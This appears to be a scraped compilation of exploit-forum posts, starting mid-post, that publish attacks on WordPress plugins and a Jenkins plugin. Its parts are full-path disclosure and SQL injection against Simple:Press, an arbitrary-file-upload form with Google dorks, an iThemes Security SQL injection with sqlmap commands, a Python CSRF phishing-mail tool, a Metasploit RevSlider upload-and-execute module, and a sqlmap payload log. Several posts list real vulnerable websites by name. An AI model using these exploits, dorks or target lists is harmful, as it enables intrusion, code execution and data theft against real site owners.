/nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-integration/sfa-integration.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-integration/sfa-integration.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/panel-options/sfa-options.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-options/sfa-options.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-options/sfa-options.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/panel-permissions/sfa-permissions.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-permissions/sfa-permissions.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-permissions/sfa-permissions.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/panel-profiles/sfa-profiles.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-profiles/sfa-profiles.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-profiles/sfa-profiles.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/panel-tags/sfa-tags.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-tags/sfa-tags.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-tags/sfa-tags.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/panel-usergroups/sfa-usergroups.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-usergroups/sfa-usergroups.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-usergroups/sfa-usergroups.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/sfa-framework.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/sfa-framework.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/sfa-framework.php on line 10 # Exploit : /wp-content/plugins/simple-forum/admin/sfa-notice.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/sfa-notice.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/sfa-notice.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/panel-toolbox/sfa-toolbox.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-toolbox/sfa-toolbox.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-toolbox/sfa-toolbox.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/panel-users/sfa-users.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-users/sfa-users.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-users/sfa-users.php on line 11 # Exploit : /wp-content/plugins/simple-forum/sf-loader-admin.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/sf-loader-admin.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/sf-loader-admin.php on line 10 # Exploit : /wp-content/plugins/simple-forum/template-tags/sf-widgets.php Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; WP_Widget_SPF has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/template-tags/sf-widgets.php on line 15 Access Denied # Exploit : /wp-content/plugins/simple-forum/editors/bbcode/sf-bbcodeinit.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/bbcode/sf-bbcodeinit.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/bbcode/sf-bbcodeinit.php on line 10 # Exploit : /wp-content/plugins/simple-forum/editors/html/sf-htmlinit.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/html/sf-htmlinit.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/html/sf-htmlinit.php on line 10 Exploit : /wp-content/plugins/simple-forum/help/documentation/database-script.sql Database: simple:press forum Version 4.2.2 Exploit : /wp-content/plugins/simple-forum/install/install-error.log Simple Forum İnstallation Log Files Exploit : /wp-content/plugins/simple-forum/install/sf-install.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/install/sf-install.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/install/sf-install.php on line 10 /wp-content/plugins/simple-forum/install/sf-upgrade.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/install/sf-upgrade.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/install/sf-upgrade.php on line 10 It gives same error : /wp-login.php?action=login&view=forum /wp-login.php?action=register&view=forum /wp-login.php?action=lostpassword&view=forum /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/css/filemanager-tm.css.php /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/fm-browse-tab.php /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/fm-edit-tab.php /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/fm-folder-tab.php /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/fm-tinymce.js.php /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/fm-upload-tab.php /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/upload_file.php /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/upload_process.php Error : Your PHP installation appears to be missing the MySQL extension which is required by WordPress. Found Templates by SimpleForum => /wp-content/plugins/simple-forum/editors/tinymce/plugins/inlinepopups/template.htm ################################################################################################# # Example Site for Full Path Disclosure and SQL Injection Vulnerability => + University of Washington - Departments Web Server Information Technology WebSite is Vulnerable. Apache/2.2.32 (Unix) mod_ssl/2.2.32 OpenSSL/1.0.1e-fips mod_pubcookie/3.3.4a mod_uwa/3.2.1 Phusion_Passenger/3.0.11 Server at depts.washington.edu Port 80 depts.washington.edu/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php => [ Proof of Concept ] => archive.is/76tXR Errors displaying on the page : Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_Logger has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php on line 21 Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_JSONReader has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/JSON.php on line 26 Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_JSON has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/JSON.php on line 362 Warning: Use of undefined constant PSPELL_FAST - assumed 'PSPELL_FAST' (this will throw an Error in a future version of PHP) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/config.php on line 9 Warning: Use of undefined constant PSPELL_FAST - assumed 'PSPELL_FAST' (this will throw an Error in a future version of PHP) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/config.php on line 15 Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; SpellChecker has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/SpellChecker.php on line 9 Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 12 Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 13 Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 14 Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 15 Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 16 Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 17 Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 18 {"result":null,"id":null,"error":{"errstr":"Could not get raw post data.","errfile":"","errline":null,"errcontext":"","level":"FATAL"}} ################################################################################################# Source [ My Topic ] => cyberizm.org/cyberizm-wordpress-simplepress-simpleforum-editors-tinymce-vuln.html ################################################################################################# # Example Sites => depts.washington.edu/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php blogs.uprm.edu/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php americanclublyon.org/site/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php ounasvaaranlatu.fi/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php alliancechristiancenter.org/development/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php churchoffrancisdesales.org/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php mudslingerevents.com/blog/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php preux-volley-ball.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php muenterprises.org/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php kjergaardsports.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php confemen.org/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php veda.com.ng/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php lisasee.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php soulographie.org/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php lunadanceinstitute.org/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php plaisance-port-leucate.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php shiatsu-angers.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php supremeroofing.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php automaxrecruitingandtraining.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php slulabservices.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
  11. ################################################################################################# # Exploit Title : WordPress DrcSystems EthicSolutions Jssor-Slider Library Plugin Arbitrary File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 19/06/2018 # Vendor Homepage : jssor.com - drcsystems.com - ethicsolutions.com - wordpress.org/plugins/jssor-slider/ # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-284 [ Improper Access Control ] - CWE-862 [ Missing Authorization ] # CXSecurity : cxsecurity.com/ascii/WLB-2018060226 ##################################################################################################### Description : “Jssor Slider by jssor.com” is open source software. Jssor Slider is professional, light weight and easy to use slideshow/slider/gallery/carousel/banner, it is optimized for mobile device with tons of unique features. # Key Features : Touch Swipe - 200+ Slideshow Transitions - Layer Animation - Fast Loading, load slider html code from disk cache directly - High Performance Light Weight - Easy to Use - Repeated Layer Animation - Image Layer - Text/Html Layer - Panel Layer - Nested Layer - Layer Blending - Clip Mask Multiplex Transition - z-index Animation - Timeline Break - Dozens of bullet/arrow/thumbnail skins ##################################################################################################### Affected Jssor Slider Plugin Code : When the plugin is active the function register_ajax_calls() in the file /lib/jssor-slider-class.php is run: That gives anyone access to two AJAX functions that are only intended to be accessible to those logged in as Administrators. The upload_library() function accessible through that handles uploading a file through /lib/upload.php. That file also doesn’t do any checks as to who is making the request and does not restrict what type of files can be uploaded. It is also possible to exploit this by sending a request directly to the file /lib/upload.php, as long as the undefined constant in that isn’t treated as an error. The following proof of concept will upload the selected file to the directory /wp-content/jssor-slider/jssor-uploads/. Make sure to replace “[path to WordPress]” with the location of WordPress. public function register_ajax_calls() { if ( isset( $_REQUEST['action'] ) ) { switch ( $_REQUEST['action'] ) { case 'add_new_slider_library' : add_action( 'admin_init', 'jssor_slider_library' ); function jssor_slider_library() { include_once JSSOR_SLIDER_PATH . '/lib/add-new-slider-class.php'; } break; case 'upload_library' : add_action( 'admin_init', 'upload_library' ); function upload_library() { include_once JSSOR_SLIDER_PATH . '/lib/upload.php'; } break; } } } ##################################################################################################### # Google Dorks : inurl:''/wp-content/jssor-slider/jssor-uploads/'' intext:''Managed by Web development company Ethic Solutions'' intext:''Todos los derechos reservados © Ecuaauto - Distribuidor autorizado Chevrolet Ecuador'' intext:''Website Developed by DRC Systems'' ##################################################################################################### # PoC : /wp-admin/admin-ajax.php?param=upload_slide&action=upload_library # Error : {"jsonrpc" : "2.0", "result" : null, "id" : "id"} # Exploit Code : <html> <body> <form action="http://[PATH]/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library" method="POST" enctype="multipart/form-data" > <input type="file" name="file" /> <input type="submit" value="Submit" /> </form> </body> </html # Uploaded File Path : /wp-content/jssor-slider/jssor-uploads/..... # Allowed File Extensions : With the exception of php and asp. [ Not Allowed ] But other files extensions are allowed. For example html and txt and etcetra.... # Usage : Use with XAMPP Control Panel and with your Localhost [ 127.0.0.1] localhost/jssorsliderexploiter.html ################################################################################################# # Example All Vulnerable Sites => treeline.co/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library sss2003.org/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library lr-parts.com.ua/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library eduardobermejo.com/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library anro.net.pl/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library esplural.com/ecuaauto/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library sardardham.org/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library butterbean.ph/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library canoes.fr/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library betterimpact.ca/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library klshospital.co.in/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library ############################################################################ Reference [ Me ] : cyberizm.org/cyberizm-wordpress-drcsystems-ethicsolutions-jssorslider-exploit.html ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  12. # Exploit Title: WordPress Plugin iThemes Security 7.0.2 - Authenticated SQL Injection # Exploit Author: Rednofozi # Website: https://َanonysec.org # Vendor Homepage: https://ithemes.com/ # Software Link: https://wordpress.org/plugins/better-wp-security/ # Version/s: 7.0.2 and below # Patched Version: 7.0.3 # CVE : 2018-12636 #me :rednofozi@yahoo.com Plugin description: iThemes Security works to lock down WordPress, fix common holes, stop automated attacks and strengthen user credentials. With advanced features for experienced users, this WordPress security plugin can help harden WordPress. Description: WordPress Plugin iThemes Security(better-wp-security) before 7.0.3 allows remote authenticated users to execute arbitrary SQL commands via the 'orderby' parameter in the 'itsec-logs' page to wp-admin/admin.php. Technical details: Parameter orderby is vulnerable because backend variable $sort_by_column is not escaped. File: better-wp-security/core/admin-pages/logs-list-table.php Line 271: if ( isset( $_GET[' orderby '], $_GET['order'] ) ) { Line 272: $ sort_by_column = $_GET[' orderby ']; File: better-wp-security/core/lib/log-util.php Line 168: $query .= ' ORDER BY ' . implode( ', ', $ sort_by_column )); Proof of Concept (PoC): The following GET request will cause the SQL query to execute and sleep for 10 seconds if clicked on as an authenticated admin: http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip%2c(select*from(select(sleep(10)))a)&order=asc&paged=0 Using SQLMAP: sqlmap -u 'http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip*&order=asc&paged=0' --cookie "wordpress_b...; wordpress_logged_in_bbf...;" --string "WordPress" --dbms=MySQL --technique T --level 5 --risk 3 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2001
  13. # Exploit Title : Jenkins mailer plugin 1.20 - Cross-Site Request Forgery # Date : 2018-09-03 # Exploit Author : Rednofozi # Vendor Homepage : https://jenkins.io/ # Software Link : [https://updates.jenkins.io/download/plugins/mailer/1.20/mailer.hpi] # Version: [Below Version 1.20 (1.1 ~ 1.20) ] # Tested on : Linux , Windows # CVE : CVE-2018-8718 import email.message import smtplib import getpass payload_list = ['url','subject','cover_message','sender','reciver','test_email','smtp_server','l_id','l_pw'] table = {} for i in payload_list : table.update({i:''}) def send_mail() : msg = email.message.Message() msg['Subject'] = table['subject'] msg['From'] = table['sender'] msg['To'] = table['reciver'] msg.add_header('Content-Type','text/html') msg.set_payload('<a href="'+table['url']+' /descriptorByName/hudson.tasks.Mailer/sendTestMail? charset=UTF-8&sendTestMailTo='+table['test_email']+'&adminAddress='+table['reciver']+' &smtpPort=465&smtpServer='+table['smtp_server']+'&smtpAuthPasswordSecret='+table['l_pw']+' &useSMTPAuth=true&useSsl=true&smtpAuthUserName='+table['l_id']+'"> '+table['cover_message']+'</a>') s = smtplib.SMTP(table['smtp_server']) s.starttls() s.login(table['l_id'], table['l_pw']) s.sendmail(msg['From'], [msg['To']], msg.as_string()) def url_set() : url = str(input("Jenkins Server's URL(ex : http://vuln.jenkins.com) : ")) if len(url) <= 0 : print (" Can't Be Null!") url_set() elif url[0:4] != "http" : print (" URL must start with 'http://' ") url_set() else : table['url'] = url def subject_set() : subject = str(input ("SUBJECT [Default : Look! Warning with your Jenkins] : ")) if len(subject) <= 0 : subject = "Look! Waning with your Jenkins" table['subject'] = subject def cover_message() : cover_message = str(input ("Cover Message [Default : Here is your Vulnable!] : ")) if len(cover_message) <= 0 : cover_message = "Here is your Vulnable!" table['cover_message'] = cover_message def sender() : sender = str(input ("Attacker E-mail(ex : attacker@abcd.com) : ")) if len(sender) <= 0 : print (" Can't Be Null!") sender() else : table['sender'] = sender def reciver() : reciver = str(input ("Admin's E-mail(ex : admin@abcd.com) : ")) if len(reciver) <= 0 : print (" Can't Be Null!") reciver() else : table['reciver'] = reciver def test_email() : test_email = str(input ("Tester E-mail(ex : tester@abcd.com) : ")) if len(test_email) <= 0 : print (" Can't Be Null!") test_email() table['test_email'] = test_email def smtp_server() : smtp_server = str(input ("SMTP_Server [Default : smtp.gmail.com] : ")) if len(smtp_server) <= 0 : smtp_server = "smtp.gmail.com" table['smtp_server'] = smtp_server def l_id() : l_id = str(input ("Your SMTP_Server ID : ")) if len(l_id) <= 0 : print (" Can't Be Null!") l_id() table['l_id'] = l_id def l_pw() : l_pw = str(getpass.getpass("Your SMTP_Server PW : ")) if len(l_pw) <= 0 : print (" Can't Be Null!") l_pw() table['l_pw'] = l_pw def set_all () : url_set() subject_set() cover_message() sender() reciver() test_email() smtp_server() l_id() l_pw() print ("Setting Complit! Use 'show' to check options") set_help = { 'all':"Set all payload", 'help':"Show set commend's help", 'url_set':"Set only 'url_set' payload", 'subject_set':"Set only 'url_set' payload", 'cover_message':"Set only 'cover_message' payload", 'sender':"Set only 'sender' payload", 'reciver':"Set only 'reciver' payload", 'test_email':"Set only 'test_email' payload", 'smtp_server':"Set only 'smtp_server' payload", 'l_id':"Set only 'l_id' payload", 'l_pw':"Set only 'l_pw' payload", } def set_select (a) : if a=="all" : set_all() elif a=="url_set" : url_set() elif a=="subject_set" : subject_set() elif a=="cover_message" : cover_message() elif a=="sender" : sender() elif a=="reciver" : reciver() elif a=="test_email" : test_email() elif a=="smtp_server" : smtp_server() elif a=="l_id" : l_id() elif a=="l_pw" : l_pw() elif a=="help" : for i in set_help : print (" -%-20s %-s" %(i,set_help[i])) print ('') while True : direct = str(input ("CVE-2018-8718 >> ")).lower() if direct == "help" : print (""" %-10s Show this help menu. %-10s [-all / -help / -url_set / -subject_set / .... ] %-10s Set the Payload %-10s [-all] Show Current Setting. %-10s Send CSRF use current setting. """ %("help","set","","show","send")) elif direct[0:3] == "set" : if ' -' not in direct : if direct == "set" : set_option = ["help"] else : print (" Option error n") else : set_option = direct.split(' -')[1:] okay = 1 if len(set_option) == 1 : if set_option[0] not in set_help : print (" Option error n") else : set_select(set_option[0]) elif len(set_option) >= 2 : for i in set_option : if i in ['help', 'all'] : print (" *Option [-help / -all] cannot be use with another options n") okay = 0 break for i in set_option : if i not in set_help : print (" Option error n") okay = 0 break if okay == 1 : for i in set_option : set_select(i) elif direct[:4] == "show" : if " -" not in direct : if direct == "show" : for i in table : if i != "l_pw" : print (" %-20s %s" %(i,table[i])) print (" If you want to see l_pw... add [-all] option") print ("") else : print (" Option error n") else : show_option = direct.split(" -")[1:] if (len(show_option) == 1 and show_option[0] == 'all') : for i in table : print (" %-20s %s" %(i,table[i])) print () else : print (" Option error n") elif direct == "send" : print (" Sending CSRF Mail.....") try : send_mail() print (" Succed!!n") except : print (" Fail....") elif direct == "exit" : break else : print (" Usage : helpn") ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2002
  14. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Wordpress RevSlider File Upload and Execute Vulnerability', 'Description' => %q{ This module exploits an arbitrary PHP code upload in the WordPress ThemePunch Revolution Slider ( revslider ) plugin, version 3.0.95 and prior. The vulnerability allows for arbitrary file upload and remote code execution. }, 'Author' => [ 'Simo Ben youssef', # Vulnerability discovery 'Tom Sellers <tom[at]fadedcode.net>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/'], ['EDB', '35385'], ['WPVDB', '7954'], ['OSVDB', '115118'] ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['ThemePunch Revolution Slider (revslider) 3.0.95', {}]], 'DisclosureDate' => 'Nov 26 2015', 'DefaultTarget' => 0) ) end def check release_log_url = normalize_uri(wordpress_url_plugins, 'revslider', 'release_log.txt') check_version_from_custom_file(release_log_url, /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi, '3.0.96') end def exploit php_pagename = rand_text_alpha(4 + rand(4)) + '.php' # Build the zip payload_zip = Rex::Zip::Archive.new # If the filename in the zip is revslider.php it will be automatically # executed but it will break the plugin and sometimes WordPress payload_zip.add_file('revslider/' + php_pagename, payload.encoded) # Build the POST body data = Rex::MIME::Message.new data.add_part('revslider_ajax_action', nil, nil, 'form-data; name="action"') data.add_part('update_plugin', nil, nil, 'form-data; name="client_action"') data.add_part(payload_zip.pack, 'application/x-zip-compressed', 'binary', "form-data; name=\"update_file\"; filename=\"revslider.zip\"") post_data = data.to_s res = send_request_cgi( 'uri' => wordpress_url_admin_ajax, 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) if res if res.code == 200 && res.body =~ /Update in progress/ # The payload itself almost never deleted, try anyway register_files_for_cleanup(php_pagename) # This normally works register_files_for_cleanup('../revslider.zip') final_uri = normalize_uri(wordpress_url_plugins, 'revslider', 'temp', 'update_extract', 'revslider', php_pagename) print_good("#{peer} - Our payload is at: #{final_uri}") print_status("#{peer} - Calling payload...") send_request_cgi( 'uri' => normalize_uri(final_uri), 'timeout' => 5 ) elsif res.code == 200 && res.body =~ /^0$/ # admin-ajax.php returns 0 if the 'action' 'revslider_ajax_action' is unknown fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable or the plugin is deactivated") else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") end else fail_with(Failure::Unknown, 'ERROR') end end end
  15. # Exploit Title Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6 # Date: 2016-09-16 # Exploit Author: Larry W. Cashdollar, @_larry0 # Vendor Homepage: http://huge-it.com/joomla-portfolio-gallery/ # Software Link: # Version: 1.0.6 # Tested on: Linux # CVE : CVE-2016-1000124 # Advisory: http://www.vapidlabs.com/advisory.php?v=170 # Exploit: • $ sqlmap -u 'http://example.com/components/com_portfoliogallery/ajax_url.php' --data="page=1&galleryid=*&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2" • • • (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] • sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests: • --- • Parameter: #1* ((custom) POST) • Type: error-based • Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) • Payload: page=1&galleryid=-2264 OR 1 GROUP BY CONCAT(0x71716a7a71,(SELECT (CASE WHEN (3883=3883) THEN 1 ELSE 0 END)),0x7178627071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2 • • Type: AND/OR time-based blind • Title: MySQL >= 5.0.12 time-based blind - Parameter replace • Payload: page=1&galleryid=(CASE WHEN (9445=9445) THEN SLEEP(5) ELSE 9445 END)&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2 • --- • [13:30:39] [INFO] the back-end DBMS is MySQL • web server operating system: Linux Debian 8.0 (jessie) • web application technology: Apache 2.4.10 • back-end DBMS: MySQL >= 5.0.12 • [13:30:39] [WARNING] HTTP error codes detected during run: • 500 (Internal Server Error) - 2715 times • [13:30:39] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4' • • [*] shutting down at 13:30:39
